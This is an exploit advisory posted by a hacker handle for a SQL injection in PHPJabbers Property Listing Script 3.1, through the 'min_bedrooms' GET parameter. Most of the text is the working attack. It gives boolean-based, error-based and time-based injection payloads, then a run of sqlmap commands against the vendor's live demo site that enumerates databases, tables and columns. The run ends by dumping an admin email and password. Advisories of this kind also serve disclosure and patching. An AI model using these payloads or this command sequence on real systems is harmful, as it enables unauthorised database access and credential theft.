┌┌────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr │ │ : │ Website : phpjabbers.com │ │ │ │ Vendor : PHPJABBERS │ │ Property Listing Script │ │ Software : Property Listing Script 3.1 │ │ │ │ Vuln Type: Remote SQL Injection │ │ Script will give you │ │ Method : GET │ │ the tools to efficiently manage │ │ Critical : High [░░▒▒▓▓██] │ │ your own real estate portal │ │ Impact : Database Access │ │ │ │ │ │ │ │ ────────────────────────────────────────┘ └─────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost CryptoJob (Twitter) twitter.com/CryptozJob ┌┌────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └────────────────────────────────────────────────────────────────────────────────────┘┘ Live Demo Site: https://www.phpjabbers.com/property-listing-script/#sectionDemo [INFO] GET parameter 'min_bedrooms' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable GET parameter 'min_bedrooms' is vulnerable. sqlmap identified the following injection point(s) with a total of 414 HTTP(s) requests: --- Parameter: min_bedrooms (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND 7719=7719 AND (2759=2759 Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(3030=3030,1))),0x71626a7871),3030) AND (5977=5977 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND (SELECT 2245 FROM (SELECT(SLEEP(5)))iJfC) AND (1861=1861 --- sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" --current-db --batch --random-agent --threads 5 [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 6 web application technology: Apache 2.2.15 back-end DBMS: MySQL >= 5.6 [01:13:36] [INFO] fetching current database [01:13:36] [INFO] retrieved: 'pjabbers_demo_pls' current database: 'pjabbers_demo_pls' sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls --tables --batch --random-agent --- Parameter: min_bedrooms (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND 7719=7719 AND (2759=2759 Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(3030=3030,1))),0x71626a7871),3030) AND (5977=5977 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND (SELECT 2245 FROM (SELECT(SLEEP(5)))iJfC) AND (1861=1861 --- [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 6 web application technology: Apache 2.2.15 back-end DBMS: MySQL >= 5.6 Database: pjabbers_demo_pls [66 tables] +----------------------------------------------------------------+ | 1657528735_303_pls_30_property_listing_features | | 1657528735_303_pls_30_property_listing_fields | | 1657528735_303_pls_30_property_listing_multi_lang | | 1657528735_303_pls_30_property_listing_options | | 1657528735_303_pls_30_property_listing_passwords | | 1657528735_303_pls_30_property_listing_payments | | 1657528735_303_pls_30_property_listing_periods | | 1657528735_303_pls_30_property_listing_plugin_country | | 1657528735_303_pls_30_property_listing_plugin_galleries_set | | 1657528735_303_pls_30_property_listing_plugin_gallery | | 1657528735_303_pls_30_property_listing_plugin_locale_languages | | 1657528735_303_pls_30_property_listing_plugin_locale | | 1657528735_303_pls_30_property_listing_plugin_log_config | | 1657528735_303_pls_30_property_listing_plugin_log | | 1657528735_303_pls_30_property_listing_plugin_one_admin | | 1657528735_303_pls_30_property_listing_plugin_paypal | | 1657528735_303_pls_30_property_listing_plugin_sms | | 1657528735_303_pls_30_property_listing_properties_features | | 1657528735_303_pls_30_property_listing_properties | | 1657528735_303_pls_30_property_listing_roles | | 1657528735_303_pls_30_property_listing_types | | 1657528735_303_pls_30_property_listing_users | | 1657921261_148_pls_30_property_listing_features | | 1657921261_148_pls_30_property_listing_fields | | 1657921261_148_pls_30_property_listing_multi_lang | | 1657921261_148_pls_30_property_listing_options | | 1657921261_148_pls_30_property_listing_passwords | | 1657921261_148_pls_30_property_listing_payments | | 1657921261_148_pls_30_property_listing_periods | | 1657921261_148_pls_30_property_listing_plugin_country | | 1657921261_148_pls_30_property_listing_plugin_galleries_set | | 1657921261_148_pls_30_property_listing_plugin_gallery | | 1657921261_148_pls_30_property_listing_plugin_locale_languages | | 1657921261_148_pls_30_property_listing_plugin_locale | | 1657921261_148_pls_30_property_listing_plugin_log_config | | 1657921261_148_pls_30_property_listing_plugin_log | | 1657921261_148_pls_30_property_listing_plugin_one_admin | | 1657921261_148_pls_30_property_listing_plugin_paypal | | 1657921261_148_pls_30_property_listing_plugin_sms | | 1657921261_148_pls_30_property_listing_properties_features | | 1657921261_148_pls_30_property_listing_properties | | 1657921261_148_pls_30_property_listing_roles | | 1657921261_148_pls_30_property_listing_types | | 1657921261_148_pls_30_property_listing_users | | pls_30_property_listing_features | | pls_30_property_listing_fields | | pls_30_property_listing_multi_lang | | pls_30_property_listing_options | | pls_30_property_listing_passwords | | pls_30_property_listing_payments | | pls_30_property_listing_periods | | pls_30_property_listing_plugin_country | | pls_30_property_listing_plugin_galleries_set | | pls_30_property_listing_plugin_gallery | | pls_30_property_listing_plugin_locale | | pls_30_property_listing_plugin_locale_languages | | pls_30_property_listing_plugin_log | | pls_30_property_listing_plugin_log_config | | pls_30_property_listing_plugin_one_admin | | pls_30_property_listing_plugin_paypal | | pls_30_property_listing_plugin_sms | | pls_30_property_listing_properties | | pls_30_property_listing_properties_features | | pls_30_property_listing_roles | | pls_30_property_listing_types | | pls_30_property_listing_users | +----------------------------------------------------------------+ sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls -T pls_30_property_listing_users --columns --batch --random-agent fetching columns for table 'pls_30_property_listing_users' in database 'pjabbers_demo_pls' Database: pjabbers_demo_pls Table: pls_30_property_listing_users [12 columns] +------------+------------------+ | Column | Type | +------------+------------------+ | created | datetime | | email | varchar(255) | | fax | varchar(255) | | id | int(10) unsigned | | ip | varchar(15) | | is_active | enum('T','F') | | last_login | datetime | | name | varchar(255) | | password | blob | | phone | varchar(255) | | role_id | int(10) unsigned | | status | enum('T','F') | +------------+------------------+ sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls -T pls_30_property_listing_users -C email,password --dump --batch --random-agent fetching entries of column(s) 'email,password' for table 'pls_30_property_listing_users' in database 'pjabbers_demo_pls' Database: pjabbers_demo_pls Table: pls_30_property_listing_users [1 entry] +-----------------+----------+ | email | password | +-----------------+----------+ | admin@admin.com | P@S13rd | +-----------------+----------+ [-] Done